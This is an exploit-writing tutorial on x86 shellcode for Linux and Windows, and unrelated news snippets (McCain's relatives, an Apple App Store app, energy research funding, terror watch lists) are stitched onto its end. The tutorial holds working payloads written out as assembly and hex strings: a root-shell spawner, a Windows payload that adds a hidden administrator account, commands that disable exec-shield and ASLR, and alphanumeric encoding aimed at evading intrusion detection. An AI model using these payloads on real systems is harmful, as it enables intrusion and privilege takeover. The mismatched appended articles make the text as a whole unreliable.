Writing an exploit can be difficult , what happens when all of the prewritten blocks of code cease to work ?
You need to write your own !
Hopefully this tutorial will give you a good head start .
3 . What do I need to know before I begin ?
A decent understanding of x86 assembly , C , and knowledge of the Linux and Windows operating systems .
4 . What are the differences between windows shellcode and Linux shellcode ?
Linux , unlike windows , provides a direct way to interface with the kernel through the int 0x80 interface .
A complete listing of the Linux syscall table can be found here .
Windows on the other hand , does not have a direct kernel interface .
The system must be interfaced by loading the address of the function that needs to be executed from a DLL ( Dynamic Link Library ) .
The key difference between the two is the fact that the address of the functions found in windows will vary from OS version to OS version while the int 0x80 syscall numbers will remain constant .
Windows programmers did this so that they could make any change needed to the kernel without any hassle ; Linux on the contrary has fixed numbering system for all kernel level functions , and if they were to change , there would be a million angry programmers ( and a lot of broken code ) .
5 . So , what about windows ?
How do I find the addresses of my needed DLL functions ?
Do n't these addresses change with every service pack upgrade ?
There are multitudes of ways to find the addresses of the functions that you need to use in your shellcode .
There are two methods for addressing functions ; you can find the desired function at runtime or use hard coded addresses .
This tutorial will mostly discuss the hard coded method .
The only DLL that is guaranteed to be mapped into the shellcode 's address space is kernel32.dll .
This DLL will hold LoadLibrary and GetProcAddress , the two functions needed to obtain any functions address that can be mapped into the exploits process space .
There is a problem with this method though , the address offsets will change with every new release of Windows ( service packs , patches etc. ) .
So , if you use this method your shellcode will ONLY work for a specific version of Windows .
Further dynamic addressing will be referenced at the end of the paper in the Further Reading section .
6 . What 's the hype with making sure the shellcode wo n't have any NULL bytes in it ?
Normal programs have lots of NULL bytes !
Well this is n't a normal program !
The main problem arises in the fact that when the exploit is inserted it will be a string .
As we all know , strings are terminated with a NULL byte ( C style strings anyhow ) .
If we have a NULL byte in our shellcode things wo n't work correctly .
7 . Why does my shellcode program crash when I run it ?
Well , in most shellcode the assembly contained within has some sort of self modifying qualities .
Since we are working in protected mode operating systems the .code segment of the executable image is read only .
That is why the shell program needs to copy itself to the stack before attempting execution .
8. Can I contact you ?
Sure , just email shanna@uiuc.edu .
Feel free to ask questions , comments , or correct something that is wrong in this tutorial .
9 . Why did you use intel syntax , UGHHH ?!
I do n't know !
I honestly prefer at&t syntax , but for some reason I felt compelled to do this in intel syntax .
I am really sorry !
10 .
Why does my program keep segfaulting ?
Yes , I read item 7 above , but it STILL crashes .
You probably are using an operating system with randomized stack and address space and possibly a protection mechanism that prevents you from executing code on the stack .
All Linux based operating systems are not the same , so I present a solution for Fedora that should adapt easily .
echo 0 > / proc/sys / kernel/exec-shield #turn it off echo 0 > / proc/sys/kernel/randomize_va_space #turn it off echo 1 > / proc/sys / kernel /exec-shield #turn it on echo 1 > / proc/sys/kernel/randomize_va_space #turn it on
EAX , EBX , ECX , and EDX are all 32 - bit General Purpose Registers on the x86 platform .
AH , BH , CH and DH access the upper 16 - bits of the GPRs .
AL , BL , CL , and DL access the lower 8 - bits of the GPRs .
ESI and EDI are used when making Linux syscalls .
Syscalls with 6 arguments or less are passed via the GPRs .
XOR EAX , EAX is a great way to zero out a register ( while staying away from the nefarious NULL byte ! )
In Windows , all function arguments are passed on the stack according to their calling convention .
gcc
ld
nasm
objdump
od fhex .c - a utility created by me to extract the shellcode from " objdump - d " and turn it into escaped hex code ( very useful ! ) .
arwin.c - a utility created by me to find the absolute addresses of windows functions within a specified DLL .
shellcodetest.c - this is just a copy of the c code found below .
it is a small skeleton program to test shellcode .
exit.asm hello.asm msgbox.asm shellex.asm sleep.asm adduser.asm - the source code found in this document ( the win32 shellcode was written with Windows XP SP1 ) .
When testing shellcode , it is nice to just plop it into a program and let it run .
The C program below will be used to test all of our code .
/*shellcodetest.c*/ char code [ ] = " bytecode will go here ! " ; int main ( int argc , char ** argv ) { int ( * func ) ( ) ; func = ( int ( * ) ( ) ) code ; ( int ) ( * func ) ( ) ; }
The easiest way to begin would be to demonstrate the exit syscall due to it 's simplicity .
Here is some simple asm code to call exit .
Notice the al and XOR trick to ensure that no NULL bytes will get into our code .
;exit.asm [ SECTION . text ] global _start _start : xor eax , eax ; exit is syscall 1 mov al , 1 ; exit is syscall 1 xor ebx , ebx ; zero out ebx int 0x80
Take the following steps to compile and extract the byte code .
steve hanna@ 1337b0x : ~$ nasm -f elf exit.asm steve hanna@ 1337b0x : ~$ ld -o exiter exit . o steve hanna@ 1337b0x : ~$ objdump -d exiter exiter : file format elf32-i386 Disassembly of section .
text : 08048080 : 8048080 : b0 01 mov $ 0x1 , %al 8048082 : 31 db xor %ebx , %ebx 8048084 : cd 80 int $ 0x80
The bytes we need are b0 01 31 db cd 80 .
Replace the code at the top with :
char code [ ] = " \xb0\x01\x31\xdb\xcd\x80 " ;
Now , run the program .
We have a successful piece of shellcode !
One can strace the program to ensure that it is calling exit .
For this next piece , let 's ease our way into something useful .
In this block of code one will find an example on how to load the address of a string in a piece of our code at runtime .
This is important because while running shellcode in an unknown environment , the address of the string will be unknown because the program is not running in its normal address space .
;hello.asm [ SECTION . text ] global _start _start : jmp short ender starter : xor eax , eax ; clean up the registers xor ebx , ebx xor edx , edx xor ecx , ecx mov al , 4 ; syscall write mov bl , 1 ; stdout is 1 pop ecx ; get the address of the string from the stack mov dl , 5 ; length of the string int 0x80 xor eax , eax mov al , 1 ; exit the shellcode xor ebx , ebx int 0x80 ender : call starter ; put the address of the string on the stack db ' hello '
steve hanna@ 1337b0x : ~$ nasm -f elf hello.asm steve hanna@ 1337b0x : ~$ ld -o hello hello . o steve hanna@ 1337b0x : ~$ objdump -d hello hello : file format elf32-i386 Disassembly of section .
text : 08048080 < _start > : 8048080 : eb 19 jmp 804809 b 08048082 < starter > : 8048082 : 31 c0 xor %eax , %eax 8048084 : 31 db xor %ebx , %ebx 8048086 : 31 d2 xor %edx , %edx 8048088 : 31 c9 xor %ecx , %ecx 804808a : b0 04 mov $ 0x4 , %al 804808 c : b3 01 mov $ 0x1 , %bl 804808e : 59 pop %ecx 804808f : b2 05 mov $ 0x5 , %dl 8048091 : cd 80 int $ 0x80 8048093 : 31 c0 xor %eax , %eax 8048095 : b0 01 mov $ 0x1 , %al 8048097 : 31 db xor %ebx , %ebx 8048099 : cd 80 int $ 0x80 0804809 b < ender > : 804809b : e8 e2 ff ff ff call 8048082 80480a0 : 68 65 6c 6 c 6 f push $ 0x6f6c6c65
Replace the code at the top with : char code [ ] = " \xeb\x19\x31\xc0\x31\xdb\x31\xd2\x31\xc9\xb0\x04\xb3\x01\x59\xb2\x05\xcd " \
" \x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe2\xff\xff\xff\x68\x65\x6c\x6c\x6 f " ;
At this point we have a fully functional piece of shellcode that outputs to stdout .
Now that dynamic string addressing has been demonstrated as well as the ability to zero out registers , we can move on to a piece of code that gets us a shell .
This code combines what we have been doing so far .
This code attempts to set root privileges if they are dropped and then spawns a shell .
Note : system ( " / bin/sh " ) would have been a lot simpler right ?
Well the only problem with that approach is the fact that system always drops privileges .
Remember when reading this code :
execve ( const char * filename , const char ** argv , const char ** envp ) ;
So , the second two argument expect pointers to pointers .
That 's why I load the address of the " / bin/sh " into the string memory and then pass the address of the string memory to the function .
When the pointers are dereferenced the target memory will be the " / bin/sh " string .
; shellex.asm [ SECTION . text ] global _start _start : xor eax , eax mov al , 70 ; setreuid is syscall 70 xor ebx , ebx xor ecx , ecx int 0x80 jmp short ender starter : pop ebx ; get the address of the string xor eax , eax mov [ ebx+7 ] , al ; put a NULL where the N is in the string mov [ ebx+8 ] , ebx ; put the address of the string to where the ; AAAA is mov [ ebx +12 ] , eax ; put 4 null bytes into where the BBBB is mov al , 11 ; execve is syscall 11 lea ecx , [ ebx +8 ] ; load the address of where the AAAA was lea edx , [ ebx +12 ] ; load the address of the NULLS int 0x80 ; call the kernel , WE HAVE A SHELL !
ender : call starter db '/bin/shNAAAABBBB '
steve hanna@ 1337b0x : ~$ nasm -f elf shellex.asm steve hanna@ 1337b0x : ~$ ld -o shellex shellex .o steve hanna@ 1337b0x : ~$ objdump -d shellex shellex : file format elf32-i386 Disassembly of section .
text : 08048080 : 8048080 : 31 c0 xor %eax , %eax 8048082 : b0 46 mov $ 0x46 , %al 8048084 : 31 db xor %ebx , %ebx 8048086 : 31 c9 xor %ecx , %ecx 8048088 : cd 80 int $ 0x80 804808a : eb 16 jmp 80480a2 0804808c : 804808 c : 5 b pop %ebx 804808d : 31 c0 xor %eax , %eax 804808f : 88 43 07 mov %al,0x7 ( %ebx ) 8048092 : 89 5 b 08 mov %ebx,0x8 ( %ebx ) 8048095 : 89 43 0c mov %eax ,0xc ( %ebx ) 8048098 : b0 0b mov $ 0xb , %al 804809a : 8d 4b 08 lea 0x8 ( %ebx ) , %ecx 804809d : 8d 53 0 c lea 0xc( %ebx ) , %edx 80480a0 : cd 80 int $ 0x80 080480a2 : 80480a2 : e8 e5 ff ff ff call 804808 c 80480a7 : 2f das 80480a8 : 62 69 6e bound % ebp,0x6e ( %ecx ) 80480 ab : 2f das 80480ac : 73 68 jae 8048116 80480ae : 58 pop %eax 80480 af : 41 inc %ecx 80480b0 : 41 inc %ecx 80480b1 : 41 inc %ecx 80480b2 : 41 inc %ecx 80480b3 : 42 inc %edx 80480b4 : 42 inc %edx 80480b5 : 42 inc %edx 80480b6 : 42 inc %edx
Replace the code at the top with :
char code [ ] = " \x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb " \ " \x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89 " \ " \x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd " \ " \x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f " \ " \x73\x68\x58\x41\x41\x41\x41\x42\x42\x42\x42 " ;
This code produces a fully functional shell when injected into an exploit and demonstrates most of the skills needed to write successful shellcode .
Be aware though , the better one is at assembly , the more functional , robust , and most of all evil , one 's code will be .
In order to write successful code , we first need to decide what functions we wish to use for this shellcode and then find their absolute addresses .
For this example we just want a thread to sleep for an allotted amount of time .
Let 's load up arwin ( found above ) and get started .
Remember , the only module guaranteed to be mapped into the processes address space is kernel32.dll .
So for this example , Sleep seems to be the simplest function , accepting the amount of time the thread should suspend as its only argument .
G:\> arwin kernel32.dll Sleep arwin - win32 address resolution program - by steve hanna - v.01
Sleep is located at 0x77e61 bea in kernel32.dll
;sleep.asm [ SECTION . text ] global _start _start : xor eax , eax mov ebx , 0x77e61 bea ; address of Sleep mov ax , 5000 ; pause for 5000 ms push eax call ebx ; Sleep ( ms ) ;
steve hanna@ 1337b0x : ~$ nasm -f elf sleep.asm ; ld -o sleep sleep .o ; objdump -d sleep sleep : file format elf32-i386 Disassembly of section .
text : 08048080 : 8048080 : 31 c0 xor %eax , %eax 8048082 : bb ea 1 b e6 77 mov $ 0x77e61bea , %ebx 8048087 : 66 b8 88 13 mov $ 0x1388 , %ax 804808b : 50 push %eax 804808 c : ff d3 call * %ebx Replace the code at the top with : char code [ ] = " \x31\xc0\xbb\xea\x1b\xe6\x77\x66\xb8\x88\x13\x50\xff\xd3 " ;
When this code is inserted it will cause the parent thread to suspend for five seconds ( note : it will then probably crash because the stack is smashed at this point :- D ) .
This second example is useful in the fact that it will show a shellcoder how to do several things within the bounds of windows shellcoding .
Although this example does nothing more than pop up a message box and say " hey " , it demonstrates absolute addressing as well as the dynamic addressing using LoadLibrary and GetProcAddress .
The library functions we will be using are LoadLibraryA , GetProcAddress , MessageBoxA , and ExitProcess ( note : the A after the function name specifies we will be using a normal character set , as opposed to a W which would signify a wide character set ; such as unicode ) .
Let 's load up arwin and find the addresses we need to use .
We will not retrieve the address of MessageBoxA at this time , we will dynamically load that address .
G:\>arwin kernel32.dll LoadLibraryA arwin - win32 address resolution program - by steve hanna - v.01 LoadLibraryA is located at 0x77e7d961 in kernel32.dll G:\> arwin kernel32.dll GetProcAddress arwin - win32 address resolution program - by steve hanna - v.01 GetProcAddress is located at 0x77e7b332 in kernel32.dll G:\> arwin kernel32.dll ExitProcess arwin - win32 address resolution program - by steve hanna - v.01 ExitProcess is located at 0x77e798 fd in kernel32.dll
;msgbox.asm [ SECTION . text ] global _start _start : ;eax holds return value ; ebx will hold function addresses ; ecx will hold string pointers ; edx will hold NULL xor eax , eax xor ebx , ebx ; zero out the registers xor ecx , ecx xor edx , edx jmp short GetLibrary LibraryReturn : pop ecx ; get the library string mov [ ecx + 10 ] , dl ; insert NULL mov ebx , 0x77e7d961 ; LoadLibrary A( libraryname ) ; push ecx ; beginning of user32.dll call ebx ;eax will hold the module handle jmp short FunctionName FunctionReturn : pop ecx ; get the address of the Function string xor edx , edx mov [ ecx + 11 ] , dl ; insert NULL push ecx push eax mov ebx , 0x77e7b332 ; GetProcAddress ( hmodule , functionname ) ; call ebx ;eax now holds the address of MessageBoxA jmp short Message MessageReturn : pop ecx ; get the message string xor edx , edx mov [ ecx+3 ] , dl ; insert the NULL xor edx , edx push edx ; MB_OK push ecx ; title push ecx ; message push edx ; NULL window handle call eax ; MessageBox A ( windowhandle , msg , title , type ) ; Address ender : xor edx , edx push eax mov eax , 0x77e798 fd ; exitprocess ( exitcode ) ; call eax ; exit cleanly so we do n't crash the parent program ; the N at the end of each string signifies the location of the NULL ; character that needs to be inserted GetLibrary : call LibraryReturn db ' user32.dllN ' FunctionName call FunctionReturn db ' MessageBoxAN ' Message call MessageReturn db ' HeyN '
[ steve hanna@ 1337b0 x ] $ nasm -f elf msgbox.asm ; ld -o msgbox msgbox .o ; objdump -d msgbox msgbox : file format elf32-i386 Disassembly of section .
text : 08048080 : 8048080 : 31 c0 xor %eax , %eax 8048082 : 31 db xor %ebx , %ebx 8048084 : 31 c9 xor %ecx , %ecx 8048086 : 31 d2 xor %edx , %edx
8048088 : eb 37 jmp 80480c1 0804808a : 804808a : 59 pop %ecx 804808b : 88 51 0a mov %dl,0xa( %ecx ) 804808e : bb 61 d9 e7 77 mov $ 0x77e7d961 , %ebx 8048093 : 51 push %ecx 8048094 : ff d3 call * %ebx 8048096 : eb 39 jmp 80480d1 08048098 : 8048098 : 59 pop %ecx 8048099 : 31 d2 xor %edx , %edx 804809b : 88 51 0b mov %dl,0x b ( %ecx ) 804809e : 51 push %ecx 804809f : 50 push %eax 80480a0 : bb 32 b3 e7 77 mov $ 0x77e7b332 , %ebx 80480a5 : ff d3 call * %ebx 80480a7 : eb 39 jmp 80480e2 080480a9 : 80480a9 : 59 pop %ecx 80480aa : 31 d2 xor %edx , %edx 80480ac : 88 51 03 mov %dl,0x3 ( %ecx ) 80480 af : 31 d2 xor %edx , %edx 80480b1 : 52 push %edx 80480b2 : 51 push %ecx 80480b3 : 51 push %ecx 80480b4 : 52 push %edx 80480b5 : ff d0 call * %eax 080480b7 : 80480b7 : 31 d2 xor %edx , %edx 80480b9 : 50 push %eax 80480ba : b8 fd 98 e7 77 mov $ 0x77e798fd , %eax 80480 bf : ff d0 call * %eax 080480c1 : 80480c1 : e8 c4 ff ff ff call 804808 a 80480c6 : 75 73 jne 804813 b 80480c8 : 65 gs 80480c9 : 72 33 jb 80480fe 80480cb : 32 2e xor ( %esi ) , %ch 80480cd : 64 fs 80480ce : 6 c insb ( % dx ) , %es : ( %edi ) 80480 cf : 6 c insb ( %dx ) , %es : ( %edi ) 80480d0 : 4e dec %esi 080480d1 : 80480d1 : e8 c2 ff ff ff call 8048098 80480d6 : 4d dec %ebp 80480d7 : 65 gs 80480d8 : 73 73 jae 804814d 80480da : 61 popa 80480db : 67 addr16 80480dc : 65 gs 80480dd : 42 inc %edx 80480de : 6 f outsl %ds :( %esi ) , ( %dx ) 80480df : 78 41 js 8048122 80480e1 : 4e dec %esi 080480e2 : 80480e2 : e8 c2 ff ff ff call 80480a9 80480e7 : 48 dec %eax 80480e8 : 65 gs 80480e9 : 79 4e jns 8048139
Replace the code at the top with : char code [ ] = " \x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x37\x59\x88\x51\x0a\xbb\x61\xd9 " \
" \xe7\x77\x51\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x0b\x51\x50\xbb\x32 " \
" \xb3\xe7\x77\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x03\x31\xd2\x52\x51 " \ " \x51\x52\xff\xd0\x31\xd2\x50\xb8\xfd\x98\xe7\x77\xff\xd0\xe8\xc4\xff " \ " \xff\xff\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x4e\xe8\xc2\xff\xff " \ " \xff\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x4e\xe8\xc2\xff\xff " \ " \xff\x48\x65\x79\x4e " ;
This example , while not useful in the fact that it only pops up a message box , illustrates several important concepts when using windows shellcoding .
Static addressing as used in most of the example above can be a powerful ( and easy ) way to whip up working shellcode within minutes .
This example shows the process of ensuring that certain DLLs are loaded into a process space .
Once the address of the MessageBoxA function is obtained ExitProcess is called to make sure that the program ends without crashing .
This third example is actually quite a bit simpler than the previous shellcode , but this code allows the exploiter to add a user to the remote system and give that user administrative privileges .
This code does not require the loading of extra libraries into the process space because the only functions we will be using are WinExec and ExitProcess .
Note : the idea for this code was taken from the Metasploit project mentioned above .
The difference between the shellcode is that this code is quite a bit smaller than its counterpart , and it can be made even smaller by removing the ExitProcess function !
G:\>arwin kernel32.dll ExitProcess arwin - win32 address resolution program - by steve hanna - v.01 ExitProcess is located at 0x77e798 fd in kernel32.dll G:\> arwin kernel32.dll WinExec arwin - win32 address resolution program - by steve hanna - v.01 WinExec is located at 0x77e6fd35 in kernel32.dll
;adduser.asm [ Section . text ] global _start _start : jmp short GetCommand CommandReturn : pop ebx ; ebx now holds the handle to the string xor eax , eax push eax xor eax , eax ; for some reason the registers can be very volatile , did this just in case mov [ ebx + 89 ] , al ; insert the NULL character push ebx mov ebx,0x77e6fd35 call ebx ; call WinExec ( path , showcode ) xor eax , eax ; zero the register again , clears winexec retval push eax mov ebx , 0x77e798 fd call ebx ; call ExitProcess ( 0 ) ; GetCommand : ; the N at the end of the db will be replaced with a null character call CommandReturn db " cmd.exe /c net user USERNAME PASSWORD / ADD && net localgroup Administrators / ADD USERNAMEN "
steve hanna@ 1337b0x : ~$ nasm -f elf adduser.asm ; ld -o adduser adduser .o ; objdump -d adduser adduser : file format elf32-i386 Disassembly of section .
text : 08048080 : 8048080 : eb 1b jmp 804809d 08048082 : 8048082 : 5 b pop %ebx 8048083 : 31 c0 xor %eax , %eax 8048085 : 50 push %eax 8048086 : 31 c0 xor %eax , %eax 8048088 : 88 43 59 mov %al,0x59 ( %ebx ) 804808b : 53 push %ebx 804808 c : bb 35 fd e6 77 mov $ 0x77e6fd35 , %ebx 8048091 : ff d3 call * %ebx 8048093 : 31 c0 xor %eax , %eax 8048095 : 50 push %eax 8048096 : bb fd 98 e7 77 mov $ 0x77e798fd , %ebx 804809b : ff d3 call * %ebx 0804809d : 804809d : e8 e0 ff ff ff call 8048082 80480a2 : 63 6d 64 arpl %bp,0x64 ( %ebp ) 80480a5 : 2e cs 80480a6 : 65 gs 80480a7 : 78 65 js 804810e 80480a9 : 20 2f and % ch , ( %edi ) 80480 ab : 63 20 arpl %sp , ( %eax ) 80480ad : 6e outsb %ds :( %esi ) , ( %dx ) 80480ae : 65 gs 80480 af : 74 20 je 80480d1 80480b1 : 75 73 jne 8048126 80480b3 : 65 gs 80480b4 : 72 20 jb 80480d6 80480b6 : 55 push %ebp 80480b7 : 53 push %ebx 80480b8 : 45 inc %ebp 80480b9 : 52 push %edx 80480ba : 4e dec %esi 80480bb : 41 inc %ecx 80480bc : 4d dec %ebp 80480bd : 45 inc %ebp 80480be : 20 50 41 and % dl,0x41 ( %eax ) 80480c1 : 53 push %ebx 80480c2 : 53 push %ebx 80480c3 : 57 push %edi 80480c4 : 4f dec %edi 80480c5 : 52 push %edx 80480c6 : 44 inc %esp 80480c7 : 20 2f and % ch , ( %edi ) 80480c9 : 41 inc %ecx 80480 ca : 44 inc %esp 80480cb : 44 inc %esp 80480cc : 20 26 and %ah , ( %esi ) 80480ce : 26 20 6e 65 and % ch , %es:0x65 ( %esi ) 80480d2 : 74 20 je 80480f4 80480d4 : 6 c insb ( %dx ) , %es : ( %edi ) 80480d5 : 6 f outsl %ds :( %esi ) , ( %dx ) 80480d6 : 63 61 6 c arpl %sp,0x6c( %ecx ) 80480d9 : 67 72 6f addr16 jb 804814 b 80480dc : 75 70 jne 804814e 80480de : 20 41 64 and % al,0x64 ( %ecx ) 80480e1 : 6d insl ( %dx ) , %es : ( %edi ) 80480e2 : 69 6e 69 73 74 72 61 imul $ 0x61727473,0x69 ( %esi ) , %ebp 80480e9 : 74 6 f je 804815 a 80480eb : 72 73 jb 8048160 80480ed : 20 2f and % ch , ( %edi ) 80480ef : 41 inc %ecx 80480f0 : 44 inc %esp 80480f1 : 44 inc %esp 80480f2 : 20 55 53 and % dl,0x53 ( %ebp ) 80480f5 : 45 inc %ebp 80480f6 : 52 push %edx 80480f7 : 4e dec %esi 80480f8 : 41 inc %ecx 80480f9 : 4d dec %ebp 80480fa : 45 inc %ebp 80480 fb : 4e dec %esi
Replace the code at the top with :
char code [ ] = " \xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x59\x53\xbb\x35\xfd\xe6\x77 " \ " \xff\xd3\x31\xc0\x50\xbb\xfd\x98\xe7\x77\xff\xd3\xe8\xe0\xff\xff\xff " \ " \x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73 " \ " \x65\x72\x20\x55\x53\x45\x52\x4e\x41\x4d\x45\x20\x50\x41\x53\x53\x57 " \ " \x4f\x52\x44\x20\x2f\x41\x44\x44\x20\x26\x26\x20\x6e\x65\x74\x20\x6c " \ " \x6f\x63\x61\x6c\x67\x72\x6f\x75\x70\x20\x41\x64\x6d\x69\x6e\x69\x73 " \
" \x74\x72\x61\x74\x6f\x72\x73\x20\x2f\x41\x44\x44\x20\x55\x53\x45\x52 " \ " \x4e\x41\x4d\x45\x4e " ;
When this code is executed it will add a user to the system with the specified password , then adds that user to the local Administrators group .
After that code is done executing , the parent process is exited by calling ExitProcess .
This section covers some more advanced topics in shellcoding .
Over time I hope to add quite a bit more content here but for the time being I am very busy .
If you have any specific requests for topics in this section , please do not hesitate to email me .
The basis for this section is the fact that many Intrustion Detection Systems detect shellcode because of the non-printable characters that are common to all binary data .
The IDS observes that a packet containts some binary data ( with for instance a NOP sled within this binary data ) and as a result may drop the packet .
In addition to this , many programs filter input unless it is alpha-numeric .
The motivation behind printable alpha-numeric shellcode should be quite obvious .
By increasing the size of our shellcode we can implement a method in which our entire shellcode block in in printable characters .
This section will differ a bit from the others presented in this paper .
This section will simply demonstrate the tactic with small examples without an all encompassing final example .
Our first discussion starts with obfuscating the ever blatant NOP sled .
When an IDS sees an arbitrarily long string of NOPs ( 0x90 ) it will most likely drop the packet .
To get around this we observe the decrement and increment op codes :
OP Code Hex ASCII inc eax 0x40 @ inc ebx 0x43 C inc ecx 0x41 A inc edx 0x42 B dec eax 0x48 H dec ebx 0x4B K dec ecx 0x49 I dec edx 0x4A J
So , the next portion of this printable shellcode section will discuss a method for making one 's entire block of shellcode alpha - numeric -- by means of some major tomfoolery .
We must first discuss the few opcodes that fall in the printable ascii range ( 0x33 through 0x7e ) .
sub eax , 0xHEXINRANGE push eax pop eax push esp pop esp and eax , 0xHEXINRANGE
Surprisingly , we can actually do whatever we want with these instructions .
I did my best to keep diagrams out of this talk , but I decided to grace the world with my wonderful ASCII art .
Below you can find a diagram of the basic plan for constructing the shellcode .
The plan works as follows : - make space on stack for shellcode and loader - execute loader code to construct shellcode - use a NOP bridge to ensure that there are n't any extraneous bytes that will crash our code .
- profit
The log awaited ASCII diagram 1 ) EIP ( loader code )
--------ALLOCATED STACK SPACE--------ESP
2 ) ---( loader code ) ---EIP-------STACK------ESP--( shellcode--
3 ) ----loadercode---EIP@ESP----shellcode that was builts ---
So , that diagram probably warrants some explanation .
Basically , we take our already written shellcode , and generate two to three subtract instructions per four bytes and do the push EAX , pop ESP trick .
This basically places the constructed shellcode at the end of the stack and works towards the EIP .
So we construct 4 bytes at a time for the entirety of the code and then insert a small NOP bridge ( indicated by @ ) between the builder code and the shellcode .
The NOP bridge is used to word align the end of the builder code .
Example code :
and eax , 0x454e4f4a ; example of how to zero out eax( unrelated ) and eax , 0x3a313035 push esp pop eax sub eax , 0x39393333 ; construct 860 bytes of room on the stack sub eax , 0x72727550 sub eax , 0x54545421 push eax ; save into esp pop esp
Below is a list of great resources that relate to shellcoding .
I suggest picking up a copy of all of the documents listed , but if that is an impossibility , at the very least get The Shellcoder 's Handbook ; it is a pure goldmine of information .
The Shellcoder 's Handbook by Jack Koziol et al
Hacking - The Art of Exploitation by Jon Erickson
" Understanding Windows Shellcode " by nologin.org
Conclusion
At this point the reader should be able to write at the very least basic shellcode to exploit applications on either the windows or linux platforms .
The tricks demonstrated here will help a shellcoder understand other 's shellcode and modify prewritten shellcode to fit the situation at hand .
Shellcoding is always looked at as a minor detail of hacking a piece of software but invariably , a hack is only as strong enough as its weakest link .
If the shellcode does n't work , then the attempt at breaking the software fails ; that is why it is important to understand all aspect of the process .
Otherwise , good luck and have fun shellcoding !
Denied black relative urges McCain to accept ancestry David Edwards and Stephen C. Webster
Published : Monday October 20 , 2008
Print This Email This The McCain family has a proud tradition in the United States .
They fought for integration of the south , resisted the Ku Klux Klan , led civil rights campaigns and left a lasting mark on the politics of Mississippi .
But , despite contradictory statements made by Sen.
John McCain , that branch of his family was once owned as slaves by the candidate 's ancestors
On Monday morning 's CNN Newsroom , reporter Kyra Phillips talked with Wall Street Journal 's Atlanta Bureau Chief Douglas Blackmon and Lillie McCain , a black relative of John McCain .
" We 've had the pleasure of meeting Joe McCain , " explained Lillie .
" He attends the reunions at Teoc [ Mississippi ] ... I have n't had the pleasure of meeting Senator McCain . "
" Do you think it could make a difference with regard to diversity issues , issues of race , if John McCain did participate [ in the reunions ] ? " asked Phillips .
" I think it probably could , " said Ms. McCain .
" It would give him an opportunity to know us .
I e-mailed him back in 2000 to remind him of his ties to Teoc , Mississippi .
" I heard him say on , I believe it was Meet the Press , that his ancestors owned no slaves .
Well , I certainly have carried the name McCain from the beginning of my life , and I 've known the ties to John McCain , and have tried to get him to communicate with me about that , but he has been unwilling at least to date . "
" The McCain campaign told me , when I talked to them about this , that he has n't been to any of the family reunions simply because of scheduling conflicts , " said Blackmon .
" There 's not a decision not to do that . "
Lillie McCain urged John McCain to " acknowledge the reality of the relationship that we hold . "
" Why he hasnt come [ to the reunions ] is anybodys guess , " said Charles McCain Jr. , 60 , a distant cousin of John McCain , in a report published in the South Florida Times .
" I think the best I can come up with , is that he doesnt have time , or he has just distanced himself , or it doesnt mean that much to him . "
" I am absolutely supporting Obama , and its not because hes black , " said Lillie .
" It s because he is the best person at this time in our history . "
This video is from CNN's Newsroom , broadcast October 20 , 2008 .
Download video via RawReplay.com
A soft - porn iPhone and iPod app that showed a selection of naughty , but not naked , females briefly made an appearance on the Apple App Store at the weekend .
Wallpaper Universe from FunMobility , a maker of Apple Apps , ringtones and wallpapers , debuted on the Apple App Store on Friday before mysteriously disappearing on Saturday .
Apple famously does n’t do porn , although there 's no mistaking what the app is about .
Even so , few people would have found the pictures on display offensive , with underwear covering the women ’s modesty in the photos we saw .
Apple wo n't reveal what goes on behind the scenes with their approval process , a process that often takes weeks , although someone at Apple appears to have clicked ‘ approve , ’ perhaps a little over excited , before checking the App 's full credentials .
There is a more serious side to this , Apple recently approved an app called BdEmailer , which duplicates Apple 's Mail app ( in contradiction to another contentious rule ) .
This prompted Joshua Topolsky from Engadget to say : " either you 've relaxed your policies on duplicate functionality , or you 've gotten incredibly lazy when it comes to approving applications .
We 're inclined to believe it 's the latter , as BdEmailer has a fair share of bugs that need working out , but really , people need some clarification here on what will and wo n't pass -- and moving the goalpost all the time is n't going to help . "
Apple rejected Internet Radio application CastCatcher entry into the App Store because of bandwidth concerns earlier this month , despite three prior releases to the store being accepted by Apple .
And , of course , if an application as obviously unsuitable as Wallpaper Universe can pass through Apple 's approval process , what 's stopping a more seriously malicious program from being approved ?
Image via VentureBeat .
Get four free Mac programs worth £ 82 and 40 free prints from Jessops with Macworld print magazine .
On sale now !
Click here for more information .
This is a quick addendum to the previous post exploring what it would take for a president to pursue meaningful climate and energy policy in a multitasked world .
One approach , hinted at by Senator Barack Obama off and on , is an Apollo - scale investment in advanced energy technology .
The chances of a quick push of this sort are poor given the state of the economy , but what would a “ Moon shot ” for energy look like ?
One way to consider the question is to look back at the gush of federal research and development dollars that underpinned the actual space race ( and led to a string of innovations that NASA says have produced far greater economic benefits than the research cost ) .
The graph above , generated a couple of years ago by Kei Koizumi at the American Association for the Advancement of Science , provides a hint .
The yellow band in the graph is , in essence , a portrait of the space race as reflected in federal money for basic R&D related to going into orbit and to the Moon .
( The purple band is essentially the war on cancer and similar health research .
Military research , at $ 75 billion a year — click preceding link for 2006 graph — would n’t fit in the graph above . )
The green band is a half - century of federal investment in energy research .
And that ’s not just renewable energy like solar power , but research in all energy sectors .
To me , the energy graph resembles an emaciated python that had one decent meal .
The bulge in the 1970s reflects the burst of interest in new energy technologies triggered by the oil shocks in that decade .
President Ronald Reagan has been widely blamed for eviscerating energy research , but you can see in the graph that no subsequent administration or Congress took energy innovation seriously ( and private - sector research investments have dropped even more ) .
These data are compiled annually by Mr. Koizumi and the science group ’s R&D budget and policy program .
Tune in next year to see if that green line budges .
WASHINGTON ( CNN ) --
The federal government 's terrorist watch lists are far shorter than have been reported , the secretary of homeland security said Wednesday .
Secretary of Homeland Security Michael Chertoff , seen here in May , discussed terror watch lists Wednesday .
Michael Chertoff revealed for the first time that 2,500 people are on the " no fly " list and only about 10 percent of those are U.S. citizens .
